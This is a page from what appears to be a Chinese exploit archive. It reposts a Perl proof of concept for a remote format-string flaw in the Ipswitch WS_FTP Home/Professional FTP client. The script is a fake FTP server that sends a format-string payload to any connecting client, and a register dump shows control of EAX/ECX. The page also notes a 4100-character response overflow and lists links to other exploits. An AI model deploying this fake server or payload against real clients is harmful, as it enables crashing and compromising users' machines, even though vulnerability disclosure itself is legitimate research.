手机
当前位置:查字典教程网 >网络安全 >Exploit >WS_FTP Home/Professional FTP Client Remote Format String PoC
WS_FTP Home/Professional FTP Client Remote Format String PoC
摘要:######################################################################...

##################################################################################################################

#

# Ipswitch WS_FTP Home/WS_FTP Professional FTP Client Remote Format String vulnerability

# Vendor : http://www.ipswitch.com/

# Affected Os : Windows *

# Risk : critical

#

# This bug is pretty interresting in the way you have to exploit it in a weird way...

#

# With this PoC you'll get a full control over EAX/ECX

# (

# eax=41414141 ebx=0000000a ecx=41414141 edx=00000000 esi=41414142 edi=02b1f0ab

# eip=77d3ef68 esp=02b1f01c ebp=02b1f064 iopl=0 nv up ei pl nz na po nc

# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206

# USER32!CharLowerA 0x93:

# 77d3ef68 8a10 mov dl,[eax] ds:0023:41414141=??

# )

# Fake Server PoC :

use strict;

use Socket; my $port = shift || 21;

my $proto = getprotobyname('tcp');

my $goodz = "x41x41x41x41x41x41x41x41%x%x%x%x%x%x%x%s"; my $visitor;

socket(SOCKET, PF_INET, SOCK_STREAM, $proto)

or die "To bad $!n";

setsockopt(SOCKET, SOL_SOCKET, SO_REUSEADDR, 1);

bind(SOCKET, pack( "S n a4 x8", AF_INET, $port, "" ))

or die "Shitz port $port is allready in use, shut down your ftp server !n";

listen(SOCKET, 5) or die "Listen: $!";

print "Fake Server started on port $portn";

while ($visitor = accept(NEW_SOCKET, SOCKET)) {

print NEW_SOCKET $goodz;

close NEW_SOCKET;

} # Anyways, in the WS_FTP Home client there's still a buffer overflow in the FTP server message response ( 4100 chars answer --> done ).

【WS_FTP Home/Professional FTP Client Remote Format String PoC】相关文章:

pLink 2.07 (linkto.php id) Remote Blind SQL Injection Exploit

Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF Exploit

Joomla Component n-forms 1.01 Blind SQL Injection Exploit

LoveCMS 1.6.2 Final Update Settings Remote Exploit

PHP 4.4.5 / 4.4.6 session_decode() Double Free Exploit PoC

Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF PoC

Joomla Component EZ Store Remote Blind SQL Injection Exploit

HockeySTATS Online 2.0 Multiple Remote SQL Injection Vulnerabilities

MojoClassifieds 2.0 Remote Blind SQL Injection Exploit

Microsoft Access (Snapview.ocx 10.0.5529.0) ActiveX Remote Exploit

精品推荐
分类导航